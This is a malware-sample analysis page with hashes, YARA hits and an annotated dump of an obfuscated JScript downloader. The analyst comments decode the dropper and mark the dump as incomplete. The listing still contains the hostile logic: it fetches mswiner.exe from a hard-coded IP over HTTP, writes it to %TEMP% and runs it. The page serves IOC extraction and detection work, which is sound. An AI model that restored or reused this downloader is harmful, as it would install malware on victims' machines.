Sample details: 6ee77b3f5940a746aa284de15ec413b9 --

Hashes
MD5: 6ee77b3f5940a746aa284de15ec413b9
SHA1: 07fe19580bcfdf16eb7949fc0433fca7b97919a2
SHA256: e9eba6aa0a21b4b41d6c78bde89b977508091fae2e99206120eff0dbcded045b
SSDEEP: 48:rHMUCoKpXb9i+aRREu1n1RHNok+XJ1DXdHPjKiAvpm:YqyXbXyRP1n7o5lXdvjJc
Details
File Type: Composite
Added: 2019-09-10 14:59:32
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Dropper_Strings |
Parent Files
ae571e035b3480f328db6bf66b38ce69
Strings
		Package
Package
Package
test.js
C:\fakepath\test.js
C:\Users\MAILER\AppData\Local\Temp\test.js
// ANALYST NOTE: malicious JScript downloader/dropper (WScript host), recovered from the
// sample's extracted strings. This is a PARTIAL dump: several closing tokens are missing
// (the array is never closed after 'ADODB.Stream', the accessor function and the try/catch,
// if/else and helper bodies lack their closing braces), so the listing below will not run
// as-is. Do NOT repair or execute it; it is kept here for IOC extraction and detection work.
//
// Obfuscation: string-array indirection with a one-time rotation, in the style of
// javascript-obfuscator / obfuscator.io. Every _0x1aca('0xNN') call below resolves to an
// entry of this array after the rotation performed by the IIFE that follows it.
var _0x2ac5 = [
    'Echo',
    'not\x20supported',
    'Quit',
    'MSXML2.XMLHTTP',
    'open',
    'send',
    'Status',
    'Open',
    'Type',
    'Write',
    'ResponseBody',
    'SaveToFile',
    'Close',
    'Run',
    // IOC: payload URL, plain HTTP. Defanged: hxxp://45.11.19[.]145/mswiner.exe
    'http://45.11.19.145/mswiner.exe',
    // IOC: dropped file name, written under %TEMP% (see below).
    '\x5cmswiner.exe',
    'CreateObject',
    'WScript.Shell',
    'ExpandEnvironmentStrings',
    '%TEMP%',
    'ADODB.Stream'
// Array rotation. 0x160 = 352 is pre-incremented to 353 and `while (--n)` therefore runs
// 352 times, each iteration moving the first element to the end. With 21 entries this is a
// rotation by 352 mod 21 = 16, i.e. rotated[i] == original[(i + 16) % 21]. Resolved table:
//   0x0 CreateObject   0x1 WScript.Shell   0x2 ExpandEnvironmentStrings   0x3 %TEMP%
//   0x4 ADODB.Stream   0x5 Echo            0x6 not supported              0x7 Quit
//   0x8 MSXML2.XMLHTTP 0x9 open            0xa send                       0xb Status
//   0xc Open           0xd Type            0xe Write                      0xf ResponseBody
//   0x10 SaveToFile    0x11 Close          0x12 Run
//   0x13 http://45.11.19.145/mswiner.exe   0x14 \mswiner.exe
(function (_0x55a8f1, _0x3fbcdd) {
    var _0x3b444a = function (_0x4dbf6e) {
        while (--_0x4dbf6e) {
            _0x55a8f1['push'](_0x55a8f1['shift']());
        }
    };
    _0x3b444a(++_0x3fbcdd);
}(_0x2ac5, 0x160));
// String accessor: index (given as a hex string) into the rotated array. No decryption,
// only indirection. (Closing `};` is missing from the dump.)
var _0x1aca = function (_0x3dc786, _0x3a0921) {
    _0x3dc786 = _0x3dc786 - 0x0;
    var _0x5d4a74 = _0x2ac5[_0x3dc786];
    return _0x5d4a74;
// WScript.CreateObject('WScript.Shell'), then ExpandEnvironmentStrings('%TEMP%').
// _0x37879b holds the resolved temp directory used for the drop path.
var _0x4d3d11 = WScript[_0x1aca('0x0')](_0x1aca('0x1'));
var _0x37879b = _0x4d3d11[_0x1aca('0x2')](_0x1aca('0x3'));
// Download helper: _0x3a570c(url, destPath). Fetches `url` with a synchronous
// MSXML2.XMLHTTP GET and, on HTTP 200, writes the raw body to `destPath` via ADODB.Stream.
// Any failure path calls WScript.Quit rather than throwing.
function _0x3a570c(_0x126a56, _0x5defb9) {
    try {
        // ADODB.Stream is the binary writer; if the ProgID is unavailable the script
        // prints 'not supported' and exits (the catch block's closing brace is missing).
        var _0x375a89 = new ActiveXObject(_0x1aca('0x4'));
    } catch (_0x46aa39) {
        WScript[_0x1aca('0x5')](_0x1aca('0x6'));
        WScript[_0x1aca('0x7')]();
    // MSXML2.XMLHTTP; `![]` is obfuscated `false`, so the request is synchronous.
    var _0x1cd91e = new ActiveXObject(_0x1aca('0x8'));
    _0x1cd91e[_0x1aca('0x9')]('GET', _0x126a56, ![]);
    _0x1cd91e[_0x1aca('0xa')]();
    // 0xc8 == 200: only a successful response is written to disk.
    if (_0x1cd91e[_0x1aca('0xb')] == 0xc8) {
        _0x375a89[_0x1aca('0xc')]();
        // Type = 1 (adTypeBinary) so the executable bytes are not text-converted.
        _0x375a89[_0x1aca('0xd')] = 0x1;
        _0x375a89[_0x1aca('0xe')](_0x1cd91e[_0x1aca('0xf')]);
        // SaveToFile(destPath, 2): 2 == adSaveCreateOverWrite, clobbering any existing file.
        _0x375a89[_0x1aca('0x10')](_0x5defb9, 0x2);
        _0x375a89[_0x1aca('0x11')]();
        _0x375a89 = null;
    } else {
        // Non-200 (e.g. payload host down): exit silently, leaving no artefact on disk.
        WScript[_0x1aca('0x7')]();
    _0x1cd91e = null;
// Second WScript.Shell instance as an implicit global; used only for the Run call.
MyObject = new ActiveXObject(_0x1aca('0x1'));
// Execution stage: WScript.Shell.Run('<%TEMP%>\mswiner.exe'). Detection hook: wscript.exe
// spawning an executable from the user's %TEMP% directory shortly after an outbound
// HTTP GET to the host above.
function _0x79c93b() {
    MyObject[_0x1aca('0x12')](_0x37879b + '\x5cmswiner.exe');
// Entry sequence: download http://45.11.19.145/mswiner.exe to %TEMP%\mswiner.exe, then run it.
_0x3a570c(_0x1aca('0x13'), _0x37879b + _0x1aca('0x14'));
_0x79c93b();*